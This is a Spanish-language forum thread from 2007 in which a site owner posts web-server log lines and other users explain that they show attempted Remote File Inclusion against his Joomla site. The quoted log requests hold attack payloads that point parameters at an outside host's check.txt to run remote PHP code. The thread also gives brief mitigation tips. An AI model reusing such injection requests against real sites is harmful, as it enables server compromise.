Páginas: [1] 
|
 |
|
 Autor
|
Tema: INTENTO de hack de pagina web?? no entiendo ayuda! (Leído 1385 veces)
|
kepa27
 Desconectado
Mensajes: 129
|
el otro dia sufrí un ataque en mi pagina web , me han dicho que posiblemente sea un backdoor.
En el "log" de registros puede guardar la siguiente información, y me gustaria saber si alguien puede interpretar lo que significa porque no entiendo muy bien del tema.
he kitado las ip por seguridad.
Un amigo me ha dixo que segun esto han intentado subir un archivo ( check.txt) o algo asi.
Les estaria muy agradecido, muchas gracias
??.??.??.?? | 2007-05-20 | 11:42:09 | /index.php?option=com_content&task=view&id=78&date=2007-03-01
??.??.??.?? | 2007-05-20 | 11:42:39 | /index.php?option=com_content&task=view&id=75&Itemid=45&date=2007-05-01
???.??.???.?? | 2007-05-20 | 11:43:55 | /index.php?option=http://m00.laughingllamas.com/fileupload/store/check.txt?&Itemid=
???.??.???.?? | 2007-05-20 | 11:43:59 | /index.php?option=com_content&task=http://m00.laughingllamas.com/fileupload/store/check.txt?&Itemid=
???.??.???.?? | 2007-05-20 | 11:44:01 | /index.php?option=com_content&task=view&id=http://m00.laugh
|
|
|
|
|
En línea
|
|
|
|
yeikos
Colaborador
Desconectado
Mensajes: 1.363
|
Podría ser un intento de Remote File Inclusion...
|
|
|
|
|
En línea
|
|
|
|
kepa27
Desconectado
Mensajes: 129
|
puedes ser más especifico, no soy muy tecnico en estas cosas. Por cierto he visto informacion en internet ( buscadores) y en una de las paginas aparece el enlace: http://m00.laughingllamas.com/fileupload/store/check.txt. y me redirige a la pagina de Ebay, pero en otras busquedas aparecen otros datos, como paginas webs de distintas especialidades. Agradeceria un poko de ayuda,mil gracias |
|
|
|
|
En línea
|
|
|
|
yeikos
Colaborador
Desconectado
Mensajes: 1.363
|
Lo más peligroso que se podría hacer asginandole una URL a una variable es ejecutar código PHP por parte del atacante (RFI). Por lo que veo, tu sistema de PHP es Joomla! y el atacante intenta hacer RFI en 3 variables diferentes, pero estate tranquilo, tu sistema PHP, a dias de hoy, es seguro a ataques RFI.
|
|
|
|
« Última modificación: 17 Julio 2007, 18:45 por yeikos »
|
En línea
|
|
|
|
|
|
kepa27
Desconectado
Mensajes: 129
|
entiendo entonces que lo que han intentado es subirme a mi pagina web el archivo check.txt del servidor o site www.laughingllamas.com?? Me he dado cuenta que esa pagina ya no esta operativa. Podria ser una pagina de la que se descargan archivos es decir que utiliza para subir archivos a otras paginas webs?? gracias por vuestras respuestas aunke me gustaria que me aclarasen el tema mejor.. |
|
|
|
|
En línea
|
|
|
|
yeikos
Colaborador
Desconectado
Mensajes: 1.363
|
Subirlo exactamente no, más bien ejecutar el código PHP del archivo check.txt en tu servidor... Podria ser una pagina de la que se descargan archivos es decir que utiliza para subir archivos a otras paginas webs??
Podrían ser muchas cosas, no me suena la página, búscala en google. |
|
|
|
|
En línea
|
|
|
|
diddy
Desconectado
Mensajes: 19
|
logicamente teintentaron meter una shell.... aqui esta.
???.??.???.?? | 2007-05-20 | 11:43:59 | /index.php?option=com_content&task=http://m00.laughingllamas.com/fileupload/store/check.txt?&Itemid=
es el famoso y lamer ataque rfi. nada mas define bien las variables para que no te logren inyectar la shell o en el php.ini pon el safemode en ON
Saludos.
|
|
|
|
|
En línea
|
|
|
|
|
sirdarckcat
|
jajaja ahora RFI es un "Lammer ataque"? pff, disculpa, pero los Remote File Inclusion son de los ataques mas peligrosos y potentes que existen en aplicaciones web.. Aveces me sorprende el tipo de mentalidad que tiene mucha gente xD, "XSS no es peligroso, CSRF es lo mismo que XSS, SQL injection solo sirve para PHP, y hoy, RFI es un ´lammer ataque´"  mañana van a decir que los Local File Inclusion no son explotables jajaja Saludos!! |
|
|
|
|
En línea
|
|
|
|
skapunky
Electronik
Colaborador
Desconectado
Mensajes: 1.220
www.killtrojan.es
|
es el famoso y lamer ataque rfi. No es un lammer atacque XD, que se pueda llegar a usar con cierta facilidad no quiere decir que sea lammer, y si se profundiza en los ataques RFI se puede llegar a complicar hasta que uno quiera. No es lo mismo bajarse o cojer una shell y usarla que programar una uno mismo y usarla aunque sea mas bien sencilla (mi caso). Si el que descubrio los RFI le dices que su ataque es lammer...yo creo que nos cuelga a todos. Saludos. |
|
|
|
|
En línea
|
|
|
|
|
Páginas: [1] 
|
|
|
 |
